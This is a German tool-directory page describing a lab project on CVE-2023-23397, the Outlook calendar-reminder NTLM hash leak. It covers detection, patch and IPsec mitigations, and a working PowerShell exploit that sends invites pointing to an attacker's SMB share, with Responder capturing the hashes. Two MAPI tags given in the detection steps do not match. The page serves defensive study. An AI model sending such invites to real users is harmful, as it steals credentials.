Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-23397 — Demonstration der CVE-2023-23397 Outlook Privilege Escalation-Schwachstelle | Kitploit
Tools/GitHubGitHub/gilospy/cve-2023-23397
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubgilospy/cve-2023-23397

CVE-2023-23397

Demonstration der CVE-2023-23397 Outlook Privilege Escalation-Schwachstelle

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-23397 Ausnutzungs- & Mitigations-Demo

📌 Übersicht

Dieses Projekt demonstriert die Erkennung, Ausnutzung und Abwehr von CVE-2023-23397, einer kritischen Zero-Click-NTLM-Relay-Schwachstelle in Microsoft Outlook für Windows. Diese Schwachstelle wird über Kalendereinladungen ausgenutzt und ermöglicht Angreifern, NTLMv2-Hashes ohne Benutzerinteraktion zu erfassen.

🛡️ CVSS-Score: 9.8 (Kritisch)
🖥️ Betroffene Versionen: Outlook 2013, 2016, 2019, Microsoft 365 (vor Patch vom 14. März 2023)


⚠️ Schwachstellendetails

Die Kalendererinnerungen von Outlook können so konfiguriert werden, dass sie benutzerdefinierte Sounddateien über die MAPI-Eigenschaft PidLidReminderFileParameter abspielen. Outlook validiert UNC-Pfade nicht, was bei Auslösen von Erinnerungen entfernte SMB-Anfragen ermöglicht.

root@kitploit:~
\\attacker-ip\share\sound.wav

Dies führt dazu, dass NTLMv2-Hashes an vom Angreifer kontrollierte Server gesendet werden, die dann:

  • offline geknackt werden können (Passwortwiederherstellung)
  • in NTLM-Relay-Angriffen zur Privilegienausweitung verwendet werden können

🔍 Erkennungsmethode

Verwenden Sie MFCMAPI, um Kalendereinträge zu überprüfen und nach schädlichen Werten in PidLidReminderFileParameter (MAPI-Tag 0x851F001F) zu suchen.

Schritte:

  1. Öffnen Sie MFCMAPI → QuickStart > Open Folder > Calendar
  2. Gehen Sie zu Table > Set Columns
  3. Fügen Sie das Eigenschafts-Tag 0x808A001F hinzu, um die Pfade der Erinnerungsdateien anzuzeigen
  4. Suchen Sie nach UNC-Pfaden als Indikator für eine Kompromittierung

🛠️ Abwehrtechniken

1. Microsoft-Patch installieren (Empfohlen)

Installieren Sie den Patch vom 14. März 2023 (z.B. KB5002044). Der Patch führt ein:

  • IsFileZoneLocalIntranetOrTrusted() zur Validierung von Erinnerungsdateipfaden
  • Gruppenrichtlinienoptionen zur Definition vertrauenswürdiger Domänen

Testergebnis:
Outlook protokolliert Ereignis-ID 1008 und blockiert den Zugriff auf nicht vertrauenswürdige SMB-Pfade.


2. IPsec-Netzwerkebenen-Abwehr (Vorübergehend)

a. Alle SMB blockieren

  • Blockiert ausgehenden TCP-Port 445 (SMB)
  • Verhindert NTLM-Lecks an nicht vertrauenswürdige Netzwerke

b. Nur vertrauenswürdige IPs zulassen

  • Definieren Sie interne IPs (z.B. 192.168.1.0/24)
  • Stellen Sie die Geschäftskontinuität für die interne SMB-Nutzung sicher

📂 Vorgefertigte Richtlinie: OutlookMitigation.ipsec


💻 Projekteinrichtung

Umgebung

SystemBenutzernamePasswort
Kali Linuxkalikali
Windows 10 VMCVE-2023-23397vbox@123
E-Mail-Kontovictim​@exploit.comvbox@123

Angreifer (Kali Linux)

root@kitploit:~
sudo apt install responder
sudo responder -I eth0 -v

Stellen Sie sicher, dass Kali und die Opfer-VM im selben Netzwerk sind.


Opfer (Windows + Outlook 2013)

  1. Installieren Sie:

    • Outlook 2013
    • .NET 2.0
    • hMailServer
    • MFCMAPI
  2. Einrichtung:

    • hMailServer-Domäne: exploit.com
    • E-Mail-Benutzer: [email protected]

🚨 Ausnutzung (PowerShell-Skript)

root@kitploit:~
# Initialize Outlook COM object
$Outlook = New-Object -ComObject Outlook.Application
$Namespace = $Outlook.GetNamespace("MAPI")
 
$ip = "192.168.1.7" # Attacker IP here
$emails = @("[email protected]")  # List of emails

# Create a new appointment item
$Appointment = $Outlook.CreateItem(1) # 1 corresponds to olAppointmentItem

# Set appointment properties
$Appointment.Subject = "CVE Presentation Demo Demo"
$Appointment.Body = "This is a test meeting, please ignore it."
$Appointment.Location = "Dubai"
$Appointment.Start = (Get-Date).AddSeconds(1) # Start time set to 1 second from now
$Appointment.Duration = 30 # Duration in minutes

# Configure reminder settings
$Appointment.ReminderSet = $true
$Appointment.ReminderMinutesBeforeStart = 0
$Appointment.ReminderOverrideDefault = $true
$Appointment.ReminderPlaySound = $true
$Appointment.ReminderSoundFile = "\\$ip\nonexistent\sound.wav"

foreach ($email in $emails) {
    $Appointment.Recipients.Add($email) | Out-Null
}

# Save and send the appointment
$Appointment.Save()
$Appointment.Send()

Responder erfasst den NTLMv2-Hash vom Opfersystem.


✅ Verifikation

Erkennung

  • Verwenden Sie MFCMAPI, um zu bestätigen, dass PidLidReminderFileParameter einen UNC-Pfad enthält.

Abwehr

  • Wenden Sie den Patch oder die IPsec-Richtlinie an.
  • Führen Sie das Skript erneut aus: Outlook zeigt möglicherweise eine Erinnerung an, aber es sollte kein NTLM-Hash erfasst werden.

❗ Einschränkungen

  • Das Blockieren des gesamten SMB-Datenverkehrs kann legitime Dienste beeinträchtigen (Dateifreigabe, Domänenauthentifizierung)
  • Die Pflege vertrauenswürdiger IPs kann betrieblich komplex werden
Tool herunterladen